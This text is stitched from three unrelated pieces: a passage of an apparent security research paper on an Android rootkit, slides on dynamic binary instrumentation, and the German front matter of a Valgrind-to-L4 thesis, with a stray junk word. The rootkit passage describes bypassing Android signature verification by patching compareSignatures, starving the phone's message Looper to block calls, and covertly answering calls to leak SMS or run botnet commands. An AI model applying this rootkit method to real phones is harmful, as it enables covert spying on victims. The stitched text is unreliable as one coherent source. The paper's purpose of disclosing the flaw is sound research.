The android:sharedUserId attribute allows two application s to 
share the same User ID so it can reach the other ’s application 
data and resources. The android:process sets the process where 
all the application ’s components should run.  
Setting  sharedUserId and process attributes on the manifest 
allows the r ootkit to run in the com.android.phone process; 
however, it also requires the rootkit ’s certificate to match the 
Phone App ’s certificate unless the signature verification 
process in Android is bypassed during the installation time.  
 The Phone  App applicati on is signed by the system platform 
certificate  and runs in the shared system sandbox as a system 
user. Therefore, it has more privileges to access the system 
resources. Signing the rootkit with the platform signature was 
obtained with custom ROMs , such as  Cyanogenmod, because 
they are using the default certificate which is known as it is 
released publically.  
Another method also used in this research is bypassing the 
signature verification method in order to infect the rooted 
Android official ROMs. That wa s achieved by modifying the 
Services.jar. The Services.jar has multiple java classes . One of 
these classes is PackageManagerService class responsible for 
matching the signature of the application during the installation 
time. The method in the PackageManag erService is called 
CompareSignatures , a Boolean method that returns true if the 
signature match and false if not.  The method was modified to 
always return true which means the signature is always 
matched. This approach could be used by an attacker with an y 
rooted Android easily.  
After overcoming  the security obstacles, the rootkit was 
successfully constructed inside the phone process. Yet it needs 
to go further to intercept the telephony framework APIs calls 
and take control of answering the incoming voice  calls. To 
discover  a process to intercept the telephony APIs calls and 
control the system call flow, it was necessary to understand how 
telephony applications really work to understand their 
weaknesses and vulnerabilities. However, as there is no 
documentation about the telephony applications,  it was 
essential to analyze the phone app and the internal telephony 
framework source code. Therefore, in the following section a 
discussion about Android application architecture and the 
Phone App incoming c all data flow are provided in order to 
discover any vulnerability that helps in achieve the task.  
 
O. Android Application Architecture  
In this section, an overview of how an Android application 
generally works is highlighted. When an Android application is 
not running, and one of its components starts, the Android 
system initiates a new Linux process with a single main thread 
of execution for the application. Then, when another 
component of the same application also starts, it will run in the 
same process and the same main thread.  
The main thread is essential because all the application ’s 
components will run in it by default. The main thread is 
responsible for user interface interactions and events handling . 
It also handles system calls to each application com ponent. 
Android thread can associate with a Looper which runs a 
message loop for a thread to process different messages.  A 
Looper contains a MessageQueue that contains a list of 
messages.  The interaction with the message queue is performed 
by using a  Handler class ( Figure 6). 
The Handler is associated to the Looper and its associated 
thread. Handler is responsible for handling messages within the 
MessageQueue. When a message is delivered to a Handler, a 
new message arrives in the MessageQueue.   When a th read 
creates a new Handler, it binds the Handler to it and to its 
message queue. Then the Handler can send messages to the 
message queue and handle messages as they arrive from the 
message queue.  
 
  
Figure 6 Thread’s  Looper  and Handler  
 
P. Incoming Call Data flow  
When an incoming call request arrives to the BP, it is 
delivered to the Vendor RIL.  The Vendor RIL passes the 
request to the RIL daemon which delivers the request to the 
telephony framework layer. The request message is passed 
among the telephony  framework classes in this order: RIL, 
Basecommand, GSMCallTracker, GSMPhone, BasePhone and 
then CallManager.  The CallManager communicates to the 
Phone App in the application layer of Android t o show up as an 
incoming call  (Figure 7) .  
Each class in the te lephony framework can obtain 
notifications about the arriving messages by using 
RegistrantList object, which is simply an object that holds a 
Java ArrayList of Registrants object. So each class registers 
itself with the previous class ’s list in order to ob tain 
notifications.  The rootkit takes advantage of this design and 
registers itself with PhoneBase  and receiveds the incoming 
notifications when they are delivered to the CallManager, and 
acts before CallManager Handler passes the incoming 
notification to  the Phone App. Once the rootkit has received the 
incoming notification about a new incoming call, it obtains the 
incoming call ’s caller ID and compares it with a predefined 
number. If the number does not match, it leaves the notification 
to arrive at its final destination, which is the Phone App that 
shows up as an incoming call. However, if the caller ID matches 
the predefined number, it answers the call covertly.  
 
 
Android threads can only perform one task at a time . If a long 
running task has been executed in the Handler, the message 
queue cannot handle and process any other messages. In 
Figure 7 An Incoming Voice Call Request Flow between 
the BP and AP in Android  
addition, it was discovered during this research that it is 
possible to conduct  denial of service to the Looper, so the other 
process components could not receive new arriving messages. 
Android Looper is based on c code in native libraries. When 
trying to Send Message at Front of Queue twice manipulating 
the pointers, the message que ue will be starved and the Looper 
hindered. This blocks the thread from delivering the new 
messages causing  denial of service  (DOS ), or, in another 
scenario , changing the program flow in order to execute 
malicious code. Therefore, the message queue has bee n starved 
by sending two messages at the front of the message queue to 
hinder the Looper and blocks the thread from delivering the new 
messages. Thus, when the rootkit wants to answer the call 
covertly, it hinders the Looper from delivering the other 
messa ges until finishing the call. The Looper in the phone ’s 
main thread will not be able to deliver the other messages to the 
phone application. The rootkit acts as a proxy between the 
application layer and the telephony framework to transparently 
intercept an d filter incoming voice calls from the BP (Figure 8).  
Whenever an incoming voice call request comes from the BP to 
the Phone App, the rootkit intercepts that incoming call request 
and decides whether to answer the call covertly in the case of 
calls from a specified number or to pass the call request to the 
Phon e App to show the incoming call.  
 
 
Q. The Rootkit Implementation   
The rootkit was implemented as an Android service that 
should be installed in the system partition of the application 
layer as it needs a privileged access.  The rootkit works as 
follows: the rootkit service starts with the sys tem boot and 
works as a persistent service, so when it is killed by the system 
due to shortage of the system resources, it restarts . When the 
service runs, it works inside the phone process and the phone 
process ’s main thread. The service creates a Handler  and hooks 
itself and its Handler to the main Looper of the main thread in 
phone process es. Once the Handler has been created, it is able 
to obtain and send messages from/to the phone main thread ’s 
message queue.  
When  the Handler  starts,  it registers  itself with the 
PhoneBase ’s Registrant  List to listen  to messages  that come  from  the Phone  Base  object  and to receive  notifications  before  
CallManager.  When  the Handler  receives  a new ringing  
connection  message  that comes  from  the Phone  Base,  it gets the 
caller  ID and compares  it with a predefined  number.  If the caller  
ID does not match,  it leaves  the message  to arrive  at its 
destination.  If it matches,  it answers  the call before  the Phone  
App has been  notified  and hinders  the main  Looper  by starving  
its message  queue.  The Handler  sends  two messages  to the front  
of the message  queue  hindering  the main  Looper.  
In fact, while implementing the rootkit, it was essential to use 
the Android telephony internal classes and hidden components. 
However, as it is stated in Android documentation, these 
internal and hidden API telephony classes could not be reached 
by applications other than the phone process.  This rule was 
simply achieved by excluding the jar files of the internal classes 
and the hidden APIs from the developer environment, such as 
Android Studio and Eclipse environments, and no extra steps 
were necessary to preven t using these APIs at the run time. The 
solution was simply to include these jar files in the developing 
environments in order to be able to use them.  
 
R. Rootkit Situations  
The rootkit  makes decisions based on the current situation of 
the phone call state as  follows:  
1) When a hacker calls during a call between the victim and 
another party, the rootkit will answer the hacker’s call 
without being noticed by the victim.  
2) When a hacker calls during an idle phone state, the rootkit 
will answer the call covertly and allow data exchange and 
spying.  
3) When a victim tries to initiate an outgoing call during a 
hang -up call, or when a victim receives an incoming call 
request during a hang -up call by the hacker; the phone app 
will not respond to the request and will be idle b ecause its 
main loop has been starved by a denial of service attack 
that was accomplished by the rootkit.  
 
EXPERIMENTAL DESIGN  AND  RESULTS  
Using  a real cellular infrastructure is more reliable than a 
simulated  network; therefore, a real cellular network 
infrastructure and real smartphone were used during the 
experience to validate the theory. The T -Mobile GSM network 
was selected  to conduct the experiment. The developed systems 
in this research could be run in all Android phones. However, 
in some Android devices , there is a need to modify some 
Android system audio files in order to control the voice call 
stream. The smartphones  used in this experiment are Samsung 
Galaxy S3 and Galaxy Nexus. These two phones were chosen 
because of their ability to control t he voice call stream by 
default; thus no extra work was needed to modify some system 
audio files to control the stream. The voice call was only used 
for the experiments. Both smartphones run Android Jelly Bean 
4.3.3. Galaxy Nexus runs Cyanogenmod  custom ROMs, and 
Samsung Galaxy S3 runs a rooted official ROM.  
(a) Rootkit Location  in Android Telephony Framework  
 (b) Rootkit Data flow  
Figure 8 Rootkit  Location and Control Flow on Android’s Telephony  
S. First Scenario  
The first scenario was implemented to investigate the ability 
to utilize the cellular network as a bidirectional covert channel. 
In this scenario, two individuals exchange text messages using 
a smartphone application and the cellular voice channel as a 
shared resource. In this scenario, only the audio modem w as 
used and combined with a user interface to help the two 
individuals send and receive the messages. The application 
resides in the application layer . Thus, any kind of information 
could be leaked intentionally from the sender to the receiver.  
Test Results : Figure 9 displays a screenshot of the smartphones 
to exhibit  test results  that were  conducted d uring an active voice 
call. This successfully validates the modem’s ability to utilize 
the cellular voice channel as a carrier of the generated audio 
signals by the smartphone. However, sometimes the receiver 
could not get the exact original data for several reasons, such as 
noisy environment, frame stealing scenario, smartphone audio 
hardware quality, and modem implementation.  
 
 
T. Second  Scenario  
The second  scenario examines the ability to use the proposed 
covert channel to leak information unintentionally from one 
side while the other side desires a successful communication. 
In this scenario , rootkit works in the hacked smartphone and 
monitors and filters t he incoming calls. Once rootkit has 
received an incoming voice call from a predefined number, it 
opens the voice channel covertly before it shows up in the 
smartphone’s Phone App to allow data exchange. In this 
scenario, when the channel is opened, the las t SMS in the 
hacked smartphone will be modulated and sent over the covert 
channel to be acquired by the other side. The other side uses the 
software audio modem application to modulate the audio waves 
and see the last SMS. In addition, theoretically any ki nd of data 
could be leaked , such as a picture or video; however, this 
implementation focuses on text data and was used only to 
validate the proposed covert channel.  
Test Results :  Figure 10 displays a screenshot of the 
smartphones to show test results. When the attacker made a call 
to the victim, rootkit recognized the attacker caller ID and , 
based on that fact, answered the call without showing up on the 
victim’s screen. The victim had no i dea about the ongoing voice 
call in his smartphone. Rootkit leaked the last received SMS in 
the victim’s device by using the software audio modem. The 
attacker obtained the SMS by using the developed audio 
modem. However, the victim might hear audio waves played in 
his/her phone, but this issue can be overcome by using  modulation techniques that simulate a natural sound like a bird 
or cricket, as these sounds could be played as a notification in 
some applications.  
 
 
U. Third  Scenar io 
The third  scenario was implemented to test the proposed 
covert channel to be involved in botnets as command and 
control C2 channel. With any botnet, C2 channel is the most 
significant part that contributes into its covertness and 
effectiveness. The desi gned system is similar to the second 
scenario as it combines both the audio modem and rootkit. 
However, when the rootkit opens the incoming voice channel 
based on a decision made regarding the caller ID number, the 
rootkit listens to any command that is se nt by the other side and 
executes it directly instead of leaking information from the 
hacked device. Rootkit will act as a botnet that listens to 
commands and executes them as required. Table 1 includes 
some of the offered commands in this scenario:  
  
 
weswaaaews  
Test Results : Figure 11 includes  screenshots of the 
smartphones to show test results. When the attacker made a call 
to the victim, rootkit recognized the attacker caller ID and , 
based on that , answered the call without showing up on the 
victim’s screen. Rootkit then waited to receive a c ommand, and 
once it was obtained, executed it . The attacker sent the 
command using the developed audio modem.   
 
 
Command  Description  
Reboot  Reboot the system.  
Clrlog  Clear call log.  
Blueto  Switch Bluetooth on.  Table 1 Some  Commands with the Implemented Bot  Figure 9:     The scree ns show  a sender and a receiver 
forming a covert channel to exchange information as audio 
through voice call.  
 
Figure  11 The right screen shows the hacker’s screen when 
he sent “Blueto” command to open the Bluetooth de vice in 
the hacked phone, the left screen shows the hacked phone 
when it respond to the command and turned on the 
Bluetooth device.  Figure 10 The right screen shows when the attacker made a call to the victim, 
and in the left screen the rootkit in the hacked phone recognized the attacker’s 
caller ID and based on that it answered the call without showing up on the 
victim’s screen  

DISCUSSION  
V. Modem analysis  
In tested scenarios , when ideal conditions occurred where the 
surrounding environment  is quiet, the smartphone hardware is 
loud and clear, air interface is not noisy, and the call is carried 
out over one speech compression technique. The results were 
perfect and accurate, as the second party got the exact sent 
message. In a realistic scena rio, these conditions are not always 
guaranteed, so any conditions can easily either hinder the 
message from being transformed or omit some frames in the 
sent message. However, the audio modem design can be 
enhanced and optimized to overcome these constrai nts. The 
objective of the audio modem implementation is only to verify 
basic functionality and show possible scenarios that can be 
implemented successfully on real smartphones.  
The modem implementation works in most Android 
smartphones, but the ability to  access the voice call stream 
varies among Android smartphones. Some smartphones can 
reach the voice stream from Audio Manager directly; however, 
reaching the voice stream of a cellular call in other smartphones 
could be accomplished by modifying some Andr oid system 
files. The current modem implementation with the capability to 
reach the voice call stream by default works on most Samsung 
Galaxy S series and Nexus smartphones.  
 
W. Rootkit Analysis  
User -mode rootkit design has two primary purposes —
building a rootkit that is able to communicate to the BP and run 
covertly in any rooted Android OS, and filtering the incoming 
call to answer voice calls, if needed, before they show up on the 
Android scree n. In addition, it was important to verify the 
ability to implement a portable rootkit that can work easily 
without modifying underlying system files or applications. In 
fact, the portability factor is significant to test the ability to 
deploy the rootkit in any smartphone device, which indicates 
the ease of its distribution among Android smartphones.  
Rootkit implementation successfully verified what it was 
meant to do. Rootkit was able to be portable and work silently. 
The r ootkit works in all Android -rooted stock ROMs, as well as 
most custom ROMs that have Jelly Bean 4.3.3 version or below , 
and it was not tested in newer version s. Rootkit was tested 
successfully in Samsung Galaxy S 3 I9300, Galaxy Nexus and 
Nexus S, Samsung Galaxy S 4, and Samsung Galaxy Duos y 
GSM versions, and is believed to work in most GSM and 
CDMA Android smartphones.   
 
X. Covert channel analysis  
The effectiveness  of a covert channel can be evaluated by 
three factors ; covertness , bandwidth, and robustness . 
Covertness determines to what extent the covert channel can be 
detected. The proposed covert  channel  is difficult to  be detect ed 
because it is unknown  by an adversary. Channel bandwidth  
refers to the channel  maximum error -free transmission rate. 
Bandwidth is usually expressed in bits per second.  
 There are m ultiple factors effect on the cellular voice channel 
bandwidth . One factor is t he used speech code c which affect s 
the bit rate of the data. In addition, the speech codec can be 
switched during calls, because cellular network providers also 
can control and increase the number of active calls within one 
base station by switching cell phones  to a low bitrate speech 
code c. That will impact the data transfer rate, as it could vary 
among the speech codec s and also in one speech codec at the 
time when the base station experiences an overload.  In the 
proposed  channel , the voice call throughput was entirely 
occupied in order t o convey covert information , and it achieved  
a through put of 13 bps with 0.018% BER.  
 
The channel robustness determines the ease of limiting the 
channel capacity by adding noise or the ease of removing the 
covert channel. Therefore, the channel robustness is high, 
because it is not reliable to remove or add noise to this kind of 
channel ; it will affect the legitimate data transferring quality.  
 
CONCLUSION  AND  FUTURE  WORK  
As smartphones are trending to increase their computational 
capabilities, employees and individuals increasingly rely on 
smartphones to perform their tasks, and as a result smartphone 
security becomes more significant than ever before. One of the 
most seri ous threats to information security, whether within 
organization or individual, is covert channels, because they 
could be employed to leak sensitive information, divert the 
ordinary use of a system, or coordinate attacks on a system. 
Therefore, identificat ion of covert channel s is considered an 
essential task.  This research takes a step in this direction by 
identifying a potential covert channel which could affect 
smartphone security. It provides a proof of concept of the ability 
to use the cellular voice c hannel as a covert channel to leak 
information or distribute malware. It introduces details of 
designing and implementing the system and the challenges and 
constrain ts that have been faced to accomplish the system. It 
has been realized during this research  that as smartphone 
hardware and software designs have changed recently, it 
allowed and contributed to the issue discussed in this research . 
This new smartphones ’ design  is adopted by multiple 
companies, and thus new smartphones are being released that 
use this design without considering the security vulnerability .   
 
This research also proves that communication between the AP 
and the BPs is vulnerable to attack in Android OS.  In addition, 
it discusses some of the Android security mechanisms that were 
easily bypassed to accomplish the mission. The paper illustrates 
some discovered flaws in Android application architecture that 
allow a break in significant a nd critical Android o perations.  
 
 
 REFERENCES  
 
[1]     C. K. LaDue, V. V. Sapozhnykov, and K. S. Fienberg, “A Data Modem 
for GSM Voice Channel,” IEEE Transactions on Vehicular Technology , vol. 
57, no. 4, pp. 2205 –2218, Jul. 2008.  
[2] M. Rashidi, A. Sayadiyan, and P. Mowlaee, “A Harmonic Approach to 
Data Transmission over GSM Voice Channel,” in 3rd International 
Conference on Information and Communication Technologies: From Theory 
to Applications, 2008. ICTTA 2008 , 2008, pp. 1 –4. 
 [3]     A. Dhananjay, A. Sharma, M. Paik, J. Chen, T. K. Kuppusamy, J. Li, 
and L. Subramanian, “Hermes: Data Transmission over Unknown Voice 
Channels,” in Proceedings of the Sixteenth Annual International Conference 
on Mobile Computing and Networking , New Yor k, NY, USA, 2010, pp. 113 –
124. 
[4] R. Kratsas. (2012). Unleashing the Audio Potential of SmartphonesMixed  
Signal Audio Products. Cirrus Logic, 
http://www.cirrus.com/en/pubs/whitePaper/smartphones_wp.pdf  
[5] Francisco Cheng, “Why Smartphones Are Smarter All One Processor,” 
Jun. 2013.  
[6]     B. W. Lampson, “A Note on the Confinement Problem,” Commun. 
ACM , vol. 16, no. 10, pp. 613 –615, Oct. 1973.  
[7]    “National Institute of Standards and  Technology -Trusted Computer 
System  Evaluation Criteria.” Aug -1983.  
[8]     R. A. Kemmerer, “A Practical Approach to Identifying Storage and 
Timing Channels: Twenty Years Later,” in Proceedings of the 18th Annual 
Computer Security Applications Conference , Washington, DC, USA, 2002, p. 
109–. 
[9]    S. J. Murdoch and S. Lewis, “Embedding Covert Channels into TCP/IP,” 
in Information Hiding , M. Barni, J. Herrera -Joancomartí, S. Katzenbeisser, 
and F. Pérez -González, Eds. Springer Berlin Heidelberg, 2005, pp. 247 –261. 
[10]     M. Bauer, “New Covert C hannels in HTTP: Adding Unwitting Web 
Browsers to Anonymity Sets,” in In Proceedings of the Workshop on Privacy 
in the Electronic Society (WPES 2003 , 2003, pp. 72 –78. 
[11]     T. Takahashi and W. Lee, “An assessment of VoIP covert channel 
threats,” in Third International Conference on Security and Privacy in 
Communications Networks and the Workshops, 2007. SecureComm 2007 , 
2007, pp. 371 –380. 
[12]     N. B. Lucena, J. Pease, P. Yadollahpour, and S. J. Chapin, “Syntax and 
Semantics -Preserving Application -Laye r Protocol Steganography,” in 
Information Hiding , J. Fridrich, Ed. Springer Berlin Heidelberg, 2005, pp. 
164–179. 
[13]    M. Z. Rafique, M. K. Khan, K. Alghatbar, and M. Farooq, “Embedding 
High Capacity Covert Channels in Short Message Service (SMS),” in Secure 
and Trust Computing, Data Management and Applications , J. J. Park, J. 
Lopez, S. -S. Yeo, T. Shon, and D. Taniar, Eds. Springer Berlin Heidelberg, 
2011, pp. 1 –10. 
[14]   K. Papapanagiotou, E. Kellinis, G. F. Marias, and P. Georgiadis, 
“Alternatives for  Multimedia Messaging System Steganography,” in 
Computational Intelligence and Security , Y. Hao, J. Liu, Y. -P. Wang, Y. 
Cheung, H. Yin, L. Jiao, J. Ma, and Y. -C. Jiao, Eds. Springer Berlin 
Heidelberg, 2005, pp. 589 –596. 
  
 
 Charles Hubain
chubain@quarkslab.com
@haxelion
Dynamic Binary Instrumentation
Table of Contents
Why DBI?
The DBI process
Use cases
Debuggers are awesome!
▶You can use them to:
▶Find memory bugs/vulnerabilities
▶Trace dataflow to help reversing
▶Analyze performances: critical path, hotspot, memory
access patterns, ...
▶All of the above can be automatized
Debuggers are sloooooow!
Debugger Kernel Debuggee
Continue
Wait for 
debuggeeReschedule
debuggee
Execution
BreakpointResume
Interrupt
Event dispatch
Reschedule
debugger
Wait return
Kill the middle man

How?
▶In-kernel debugger? Terrible ...
▶Difficult to implement
▶If it crashes, your whole system crash
▶You still have half the rescheduling problem
▶Merge the debugger and debuggee in the same process
▶This is called instrumentation
The many flavours of instrumentation
▶Two main approaches:
▶Compile-time instrumentation
▶Source instrumentation
▶IR instrumentation
▶Run-time instrumentation
▶Hook based
▶Dynamic Binary Instrumentation
▶Here we focus on a run-time, binary approach
▶However:
▶Preemption?
▶Context switch?
▶Ressource sharing?
Table of Contents
Why DBI?
The DBI process
Use cases
Basic idea
▶Inject at runtime your instrumentation inside the binary
Original Binary CodeDisassembleGenerateInstrumentationInsert Execute
Instru
PAC-MAN
for scale
It’s a bit more complex...
▶The generated code is much bigger
▶We need to put it somewhere else
▶All the addresses become invalid
▶This means we need to patch the code
Now with 100% less branches!
▶Jump and Calls would lead to the original code...
▶It’s impossible to always predict where they lead
▶We have to remove and emulate them to keep control
The cycle of life

I thought debuggers were slow...

Table of Contents
Why DBI?
The DBI process
Use cases
Valgrind
▶It’s one of the first DBI framework!
▶Designed around a universal IR, Vex
▶A few tools:
▶memcheck : identify memory bugs
▶cachegrind : cache profiler
▶callgrind : call graph and cache profiler
▶hellgrind : identify data races
Intel Pin
▶Closed source but free
▶Focus on simplicity and ease of use

DynamoRIO
▶Focus on research and advanced techniques

Debugger vs Emulator
▶Classic CTF challenge
▶Attacking a password check by counting the executed
instructions
▶More correct characters will take more instructions to
check
▶Equivalent to a timing attack
▶Demo
Some advanced use cases
▶Whitebox fuzzing
▶Finding vulnerabilities using a mathematical model of
the program
▶The model data is obtained by DBI
▶Microsoft SAGE
▶Differential Computation Analysis
▶Breaking software crypto using hardware side channel
attacks
▶The side channel is simulated from data obtained by DBI
▶SSTIC Presentation
Diplomarbeit
L4/Valgrind
Aaron Pohle
2009
Technische Universität Dresden
Fakultät Informatik
Institut für Systemarchitektur
Professur Betriebssysteme
Betreuender Hochschullehrer: Prof. Dr. rer. nat. Hermann Härtig
Betreuende Mitarbeiter: Björn Döbel, Michael Roitzsch


Erklärung
Hiermit erkläre ich, dass ich diese Arbeit selbstständig erstellt und keine anderen
als die angegebenen Hilfsmittel benutzt habe.
Dresden, den 28. März 2009
Aaron Pohle

Inhaltsverzeichnis
1 Einführung 3
1.1 Die Analyse . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3
1.2 Debugging-Werkzeuge . . . . . . . . . . . . . . . . . . . . . . . . . . . 7
1.3 L4: Mikrokern und Multi-Server-OS . . . . . . . . . . . . . . . . . . . 11
1.4 L4Env . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
2 Valgrind 15
2.1 Der Aufbau Valgrinds . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15
2.2 Geschichte und aktueller Status . . . . . . . . . . . . . . . . . . . . . 16
2.3 Das Valgrind-Framework LibVEX & Coregrind . . . . . . . . . . . . . 17
2.4 Der Start von Valgrind unter Linux . . . . . . . . . . . . . . . . . . . 18
2.5 Ressourcen-Konflikte . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19
2.6 C-Bibliothek . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20
2.7 Speicherverwaltung in Valgrind . . . . . . . . . . . . . . . . . . . . . 20
2.8 Systemaufrufe des Gastes . . . . . . . . . . . . . . . . . . . . . . . . . 20
2.9 Tasks und Threads in Valgrind . . . . . . . . . . . . . . . . . . . . . . 21
2.10 Funktionsersetzung, Funktionswrapping und Anfragen des Gastes 22
2.11 Tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23
2.12 Valgrind in Aktion - interpretierte Ausführung des Gastes . . . . . 25
3 Die Portierung 29
3.1 Valgrind & L4Env . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 29
3.1.1 Programme im L4Env . . . . . . . . . . . . . . . . . . . . . . . 29
3.1.2 Valgrind im L4Env . . . . . . . . . . . . . . . . . . . . . . . . . 30
3.1.3 C-Bibliothek, POSIX & L4 . . . . . . . . . . . . . . . . . . . . . 32
3.1.4 Anfragen des Gastes . . . . . . . . . . . . . . . . . . . . . . . . 33
3.2 Speicherverwaltung . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 34
3.2.1 Speicherverwaltung in L4 . . . . . . . . . . . . . . . . . . . . 34
3.2.2 Region-Mapper und Dataspace-Manager . . . . . . . . . . . 36
3.2.3 Valgrind, Gast und Region-Mapper . . . . . . . . . . . . . . . 37
3.3 Kommunikation mit dem Kern . . . . . . . . . . . . . . . . . . . . . . 42
3.3.1 Systemaufrufe in L4 . . . . . . . . . . . . . . . . . . . . . . . . 44
VII
Inhaltsverzeichnis
3.3.2 Integration der L4-Systemaufrufe in LibVEX und Valgrind . 45
3.4 Tasks und Threads . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 45
3.4.1 Tasks und Threads in L4 . . . . . . . . . . . . . . . . . . . . . 45
3.4.2 Tasks und Threads im L4Env . . . . . . . . . . . . . . . . . . . 46
3.4.3 Threads in Valgrind . . . . . . . . . . . . . . . . . . . . . . . . 46
3.4.4 Tasks in Valgrind . . . . . . . . . . . . . . . . . . . . . . . . . . 49
4 Auswertung 51
4.1 Die Test-Umgebung . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 51
4.2 Die Valgrind-Standard-Tools auf L4 . . . . . . . . . . . . . . . . . . . 51
4.3 Performance . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 56
5 Zusammenfassung 65
5.1 Ausblick . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 65
5.2 Abschließende Worte . . . . . . . . . . . . . . . . . . . . . . . . . . . . 66
Glossar 67
Literaturverzeichnis 69
VIII
Abbildungsverzeichnis
1.1 Copy & Annotate . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5
1.2 Disassemble & Resynthesize . . . . . . . . . . . . . . . . . . . . . . . . 6
1.3 Aufbau des L4Env . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
2.1 Code für Funktionsersetzung und Funktionswrapping . . . . . . . . 23
2.2 Quell-Code des einfachsten Valgrind-Tools – Nulgrind . . . . . . . . 24
2.3 Interpretierte Ausführung des Gastes . . . . . . . . . . . . . . . . . . 25
2.4 Ausführung eines Programmes auf einem monolithischen System:
nativ (links) und in Valgrind (rechts). . . . . . . . . . . . . . . . . . . 27
3.1 Ausführung eines Programmes auf einem mikrokern-basierten
System: nativ (links) und in Valgrind (rechts). . . . . . . . . . . . . 31
3.2 Pagefault-Handling in Architekturen mit monolithischem Kern, z.B.
in Linux, Windows . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35
3.3 Pagefault-Handling in Mikrokern-Architekturen wie L4 . . . . . . . 36
3.4 Beschränkung auf einen Region-Mapper . . . . . . . . . . . . . . . . 40
3.5 Verletzen der Atomaritäts-Annahme . . . . . . . . . . . . . . . . . . . 41
3.6 Implementation der Semaphoren in Valgrind im L4Env . . . . . . . 47
3.7 Threads in Valgrind . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 48
4.1 Quellcode mit Programmierfehlern, die Memcheck erkennen und
beschreiben kann . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 52
4.2 Aufrufgraph des L4Env-Startcodes . . . . . . . . . . . . . . . . . . . . 54
4.3 Speicherverbrauch von tinycc auf L4 . . . . . . . . . . . . . . . . . . 55
4.4 Speeddown von md5sum (links) und sarp (rechts) . . . . . . . . . . 59
4.5 Speeddown von bigcode (links) und tinycc (rechts) . . . . . . . . . . 60
4.6 Speeddown von heap (links) und bz2(rechts) . . . . . . . . . . . . 61
4.7 Speeddown von fbench (links) und ffbench (rechts) . . . . . . . . . 62
4.8 Speeddown von task_ipc (links) und thread_ipc (rechts) . . . . . . 63
4.9 Durchschnitt der Speeddowns der einzelnen Tools in Linux und L4 64
IX

Tabellenverzeichnis
1.1 Vergleich der vorgestellten Analyse-Werkzeuge . . . . . . . . . . . . 12
1.2 Server und Bibliotheken des L4Env . . . . . . . . . . . . . . . . . . . 14
3.1 Funktionen zur Interaktion mit dem Region-Mapper . . . . . . . . . 43
4.1 Absolute Ausführungszeiten und Speeddown von md5sum undsarp 59
4.2 Absolute Ausführungszeiten und Speeddown von bigcode undtinycc 60
4.3 Absolute Ausführungszeiten und Speeddown von heap undbz2. . 61
4.4 Absolute Ausführungszeiten und Speeddown von fbench undffbench 62
4.5 Absolute Ausführungszeiten und Speeddown von task_ipc und
thread_ipc . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 63
XI

Motivation
„The computer programmer is a creator of universes for which he
alone is responsible. Universes of virtually unlimited complexity can
be created in the form of computer programs.“ (Joseph Weizenbaum)
Bereits seit dem ersten Computer-Programm von Ada Lovelace aus dem Jahr
1842 nimmt die Komplexität von Software zu. Die damit einhergehenden Fehler
sind ein impliziertes Folgeproblem, das gleichermaßen qualitativ als auch quanti-
tativ mit dem Grad der Entwicklung wächst. Daher sind automatisierte Fehlersu-
che sowie Testläufe unabdingbare Voraussetzung, um einerseits hochkomplizierte
Prozesse zu prüfen bzw. zu korrigieren und andererseits die Programmierkosten
wesentlich zu senken.
Systemnahe Programmiersprachen wie C oder C ++verfügen naturbedingt
über keinen Schutz vor typischen Programmierfehlern [19]. Dies sind beispiels-
weise Fehler der Speicherverwaltung – also Stack-Überläufe, Memory-Leaks oder
die Benutzung von nicht alloziertem Speicher. In Hochsprachen wie Java oder Py-
thon können solche Fehler konstruktionsbedingt nicht auftreten: Es ist unmöglich,
Zeiger zu benutzen oder selbst Speicher zu verwalten. Dies führt zu erheblichen
Einschränkungen für das Implementieren von Betriebssystemen, Treibern oder
anderer systemnaher Software. Dieser Sachzwang erfordert den Einsatz system-
naher Programmiersprachen in Verbindung mit entsprechenden Analyse-Tools für
automatische Tests sowie das Validieren von C- und C ++- Programmen. Generell
kann zwischen zwei möglichen Analyseverfahren unterschieden werden:
1.Analyse vor der Ausführung, die die Prüfung von Semantik, Syntax, Spei-
cherallokationen, logischer Ausdrücke, Schnittstellen und Sicherheitsaspek-
te[13]ermöglicht.
2.Analyse während der Ausführung; diese ermöglicht tiefe Einblicke in das
ausgeführte Programm zum Debugging und Testen. Durch Instrumentie-
rung zur Laufzeit können Programme auf Fehler jeglicher Art geprüft wer-
den.
Mikrokerne der zweiten Generation wurden mit dem Ziel entworfen, Geschwin-
digkeit und Minimalismus zu vereinen sowie gleichzeitig Modularität, Flexibilität
1
und Sicherheit zu verbessern. Fiasco ist ein solcher Mikrokern; er wurde im
Rahmen des Dresden Realtime Operating System (DROPS) an der Technischen
Universität Dresden entwickelt. DROPS ist ein mikrokern-basiertes Betriebssy-
stem, das aus dem L4-Mikrokern Fiasco und mehreren Servern – welche Dienste
wie Dateisysteme, Netzwerk oder Grafik zur Verfügung stellen – sowie den Nut-
zerprogrammen besteht.
Ziel dieser Arbeit ist die Portierung von Valgrind auf das mikrokern-basierte
Betriebssystem DROPS. Valgrind ist ein Framework zur dynamischen binären
Analyse von Programmen. Mit Valgrind können Tools zum automatischen Testen
und Validieren von Programmen entwickelt werden. Durch die Portierung kann
Valgrind für die Entwicklung robuster, fehlerfreier und stabiler Programme für L4
genutzt werden.
Gliederung
Im ersten Kapitel „Einführung“ meiner Arbeit diskutiere ich unterschiedliche
Analyse-Arten und stelle Werkzeuge zur automatischen Analyse sowie die Zie-
lumgebung meiner Portierung vor. Im zweiten Kapitel beschäftige ich mich mit
Valgrind, einem Werkzeug, das der automatischen Fehlersuche während der
Laufzeit dient. Im dritten Kapitel „Die Portierung“ erläutere ich notwendige Än-
derungen und getroffene Entscheidungen bei der Portierung von Valgrind auf L4.
